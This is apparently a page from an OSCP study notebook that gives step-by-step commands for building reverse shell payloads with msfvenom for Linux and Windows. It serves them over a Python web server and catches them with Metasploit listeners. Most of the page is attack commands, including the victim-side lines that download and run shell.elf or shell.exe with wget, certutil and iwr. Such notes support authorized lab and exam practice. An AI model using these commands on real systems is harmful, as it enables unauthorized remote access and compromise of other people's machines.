Making file and listener.

For Linux [OSCP allowed]

On kali linux

# This will make a reverse shell file.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$IP_KALI LPORT=443 -f elf > shell.elf

# This will start the listener in the background, allowing you to send the file later.
python3 -m http.server 8005 &

# Now start the listener with the below command.
msfconsole -q -x "use multi/handler; set payload linux/x64/shell_reverse_tcp; set lhost $IP_KALI; set lport 443; exploit"

On Victim Linux machine:

# Download the file from the server.
wget http://$IP_KALI:8005/shell.elf

# Give Permission for it to run.
chmod 700 shell.elf

# Run the file.
./shell.elf

Check the listener.

For Windows [OSCP allowed]:

There are three types of payload you can use.

All these ways of running the file on the victim windows machine will be the same.

On the victim's Windows machine for running payload:

First, create a payload from any of the mentioned types based on your requirements and system configuration.

If you are using CMD:

# Moving to temp directory.
mkdir C:\temp 2> $null ; cd C:\temp


# Download the file using the below command.
certutil -urlcache -f http://$IP_KALI:8005/shell.exe shell.exe

# run it.
.\shell.exe

If you are using powershell:

# Moving to temp directory.
mkdir C:\temp 2> $null ; cd C:\temp

# Download the file using the below command.
iwr -uri http://IP_KALI:8005/shell.exe -Outfile shell.exe

# Run it.
.\shell.exe

Type 1: Using powershell_reverse_tcp payload

On kali Linux

# Create a separate directory to store this file.
mkdir -p reverse_shell_files ; cd reverse_shell_files

# Make a binary file for the reverse shell.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_KALI LPORT=443 -f exe > shell.exe

# Start the Python web server in the background to transfer the file.
python3 -m http.server 8005 &

# Start the listener.
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set lhost $IP_KALI; set lport 443; exploit"

Type 2: Using x64/shell/reverse_tcp [Staged payload]

First exploit is sent then the victim connects to the attacker's machine then the shell code is sent.

On kali Linux

# Create a separate directory to store this file.
mkdir -p reverse_shell_files ; cd reverse_shell_files

# Make a binary file for the reverse shell.
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP_KALI LPORT=443 -f exe > shell.exe
msfvenom -p windows/shell/reverse_tcp LHOST=$IP_KALI LPORT=443 -f exe > shell.exe
# making shell code for python
msfvenom -p windows/shell/reverse_tcp LHOST=$IP_KALI LPORT=443  EXITFUNC=thread  -f python

# Start the Python web server in the background to transfer the file.
python3 -m http.server 8005 &

# Start the listener.
msfconsole -q -x "use multi/handler; set payload windows/x64/shell/reverse_tcp; set lhost $IP_KALI; set lport 443; exploit"

msfconsole -q -x "use multi/handler; set payload windows/shell/reverse_tcp; set lhost $IP_KALI; set lport 443; exploit"

Type 3: Using x64/shell_reverse_tcp [Non-Staged payload]

Exploit and shell code are sent Together.

On kali Linux

# Create a separate directory to store this file.
mkdir reverse_shell_files ; cd reverse_shell_files

# Make a binary file for the reverse shell.
msfvenom -p windows/shell_reverse_tcp LHOST=$IP_KALI LPORT=443 -f exe > shell.exe

# Start the Python web server in the background to transfer the file.
python3 -m http.server 8005 &

# Start the listener.
msfconsole -q -x "use multi/handler; set payload windows/shell_reverse_tcp; set lhost $IP_KALI; set lport 443; exploit"

PreviousSetting up listener.NextMaking shell code

Last updated 11 months ago